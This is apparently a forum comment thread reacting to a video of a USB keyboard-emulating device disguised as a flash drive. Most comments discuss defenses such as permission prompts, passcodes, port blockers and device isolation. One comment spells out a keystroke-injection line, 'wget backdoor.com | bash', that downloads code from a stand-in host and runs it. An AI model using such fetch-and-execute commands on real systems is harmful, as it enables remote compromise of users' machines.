7 ms·
Thought it was a flash drive [video]
- _bxg1 7y agoAs has been pointed out, you couldn't block this kind of thing without blocking USB keyboards altogether. I wonder what it would look like to have a background program that would detect and intercept any newly connected device by default, give it a fake (VM?) environment, and log everything it tried to do to the screen while prompting to ask if you want to let it into the "real" system. Obviously this is what security professionals do manually, but I'm talking about a totally transparent and automatic version that could be left running all the time.
- deleted 7y ago[deleted]
- rcfox 7y agoI once worked at a place where the keyboard and mouse were chained to the tower and glued in place, and the spare USB ports were glued over.
- alexhutcheson 7y agoWhat happens when you spill coffee on your keyboard?
- aunkabahb 7y agoYou call someone in the IT department to replace the keyboard. ? Generally though, places that I've worked at with the same restrictions, also don't let you have liquids at the desk with said stations. I've been in plenty of machine rooms where liquids == fired/escorted from the building.
- AnIdiotOnTheNet 7y agoHelp Desk comes by with a new keyboard, a hair drier, and a glue gun, probably.
- fouronnes3 7y agoA simple system like android fine grained permissions? <usb device> is asking to send keyboard input. Allow/Deny?
- deleted 7y ago[deleted]
- Wowfunhappy 7y agoThis strikes me as the right solution, with two caveats: • It should allow the keyboard through—or have a timeout that defaults to "yes"—if a mouse or keyboard is not already connected. • I should have the option to disable it.
- fouronnes3 7y agodesktops and servers could have special "root ports" physically colored red and hidden at the back of the case that don't require permissions.
- dredmorbius 7y agoPS/2!
- Gaelan 7y agoIf there's a monitor, you don't need to trust the first keyboard—just display a message with "type this [random] code to allow this keyboard."
- Wowfunhappy 7y agoI like this, but how do you know the keyboard layout?
- sthgrau 7y agoMy thought was that it would be an excellent, low knowledge way of figuring that out. For example, if it said type "qwerty" and it came through as "azerty", that would get you 95% of the way to having a fully functional keyboard. Mapping out the requisite keys needed to fully identify the keys could probably be done with a fairly short number of key presses for 99+% of likely keyboards. For this case, I am assuming that the keyboard and os language are fairly compatible, at least translatable.
- zelon88 7y agoI made a script which runs on user logon in my Windows domain and watches for any USB storage device. It doesn't stop the attack, but in my small(ish) network I can easily recognize unauthorized devices. https://github.com/zelon88/Workstation_USB_Monitor https://github.com/zelon88/Workstation_USB_Monitor
- dijit 7y agoI used to do the other way around, and disable all my ports until I knew I needed to use one. Of course, there's always the possibility that I unlock my port and plug in some infected USB of my own volition and it's much more likely than some random person plugging something in. But, anyway, this thing presents as a keyboard, not a storage device.
- zelon88 7y agoI thought about disabling ports, and on some machines I do, but for the most part there would be mutiny if people couldn't charge their phones or use USB sticks for legitimate purposes. I try instead to make sure everyone is skeptical and weary of everything technology related+the corporate network. I'm in the process of creating a USB drop-test script for employee training purposes. Awareness and preparedness training has been one of my best investments of time and energy with a staggering ROI. My team recently passed my last phishing test 100%.
- fencepost 7y agoFor phone and device charging, go purchase a bunch of reputable 2 - 4 port chargers and cables and set a policy that phones at other devices should never be plugged into computers. If you want to really dissuade people, add to the policy that the full contents of any phone plugged into a company computer may be silently downloaded and examined by IT. If the corporate network you're talking about is Windows Active Directory based then I believe that there are Group Policy settings to only allow connection of encrypted external drives. I'm not sure when this was introduced, and it might only be on Windows 10, but hopefully at this point most businesses are either already there or moving in that direction.
- egypturnash 7y agoOn my Macs, when I try to connect a new Bluetooth keyboard, the system pops up a dialogue asking me to type a randomly-generated passcode before it'll accept any further data from the keyboard. But it just completely trusts any USB device I plug into it to do whatever. I wonder how much work it would be to have it ask for the user to type a randomly-generated passcode before accepting input from a new USB device?
- codezero 7y agoJeez, I thought these auto opening usb things were isolated to Windows and only old versions. What’s the story with this on macOS?
- makepanic 7y agoIt's a USB keyboard that opens types some commands to open a hard-coded website. You can't really prevent that.
- AdmiralAsshat 7y agoThis is pretty much the way a Yubikey or other 2FA token works, no? The only difference being that it doesn't send the text until the sensor is covered.
- paxswill 7y agoIt's one way a Yubikey can work: Yubikey one time password (OTP). The more common (I think? Newer and standardized at least) way (U2F) accesses the key over some other method that doesn't have it act like a keyboard. There are other operation modes for Yubikeys, but personally I only use U2F and the CCID (aka act like a smartcard) modes.
- mikeash 7y agoYou could require confirmation before accepting a new input device. This could be done with out of band signaling (such as a button on the computer itself that you push to say “yes, I want to use this keyboard”) or you could do it by requiring the user to type in a secret (such as their login password, or even just a PIN displayed on the screen) to enable it for other uses. I don’t know that people would accept this inconvenience, though.
- deleted 7y ago[deleted]
- dijit 7y ago
- fouronnes3 7y agoso... <Super>terminal<Enter>wget backdoor.com | bash<Enter>
- dijit 7y agoHasn't this been known for half-a-decade? I mean, it's a product you can literally buy and it's impossible to adequately defend against. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads https://shop.hak5.org/products/usb-rubber-ducky-deluxe https://shop.hak5.org/products/usb-rubber-ducky-deluxe
- notatoad 7y agoi've known it was possible, but it's still the first time i'd ever seen a clip of it actually happening. And i'm pretty sure using this exploit for totally benign marketing purposes is a new one.
- fencepost 7y agoThere are a variety of physical port blockers available as well as devices to lock cables in place. Some protrude, others are flush and require a key for removal. If you have business policies and training in place, hopefully the additional steps of removing a lock will also provide time for adequate second thoughts to percolate through those with poor judgment. Malicious actors won't be seriously deterred, but that's a different matter.
- NikolaeVarius 7y agoAt Defcon, a buddy of mine screwed around with a bluetooth HID device, that when connected to, would automatically attempt to open a webpage and send them to an innocuous site (Which obviously could have been a less innocuous site). Couldn't believe we got multiple people to connect to it under the guise the device would do a cool thing.
- swiley 7y agoWell it is a cool thing. It’s different and that makes it interesting. Sometimes I feel like all this worrying about computer security makes it harder for people to share new things.
- lbotos 7y agoUh, I think you are making an argument against safety and i'm not sure if you are being sarcastic? It's one thing to theorize, discuss and build something dangerous, it's another to actually use it. See Flamethrowers.
- swiley 7y agoFlamethrowers are a great analogy. Adults who know each other and the dangers well should be (and are) allowed to play with flamethrowers. I’m not sure I’d want to live in a place where they couldn’t.
- snailmailman 7y agoQubes OS has an interesting way of combatting these kinds of attacks. You can manually attach a usb drive to a specific program VM, limiting the damage possible by a malicious flash drive. I want to say it even lets you disable or whitelist usb keyboards/mice entirely but I’m not 100% certain. QubesOS is pretty different from other OSes though, I wish those sorts of device isolation were possible or more easily accomplished in other operating systems.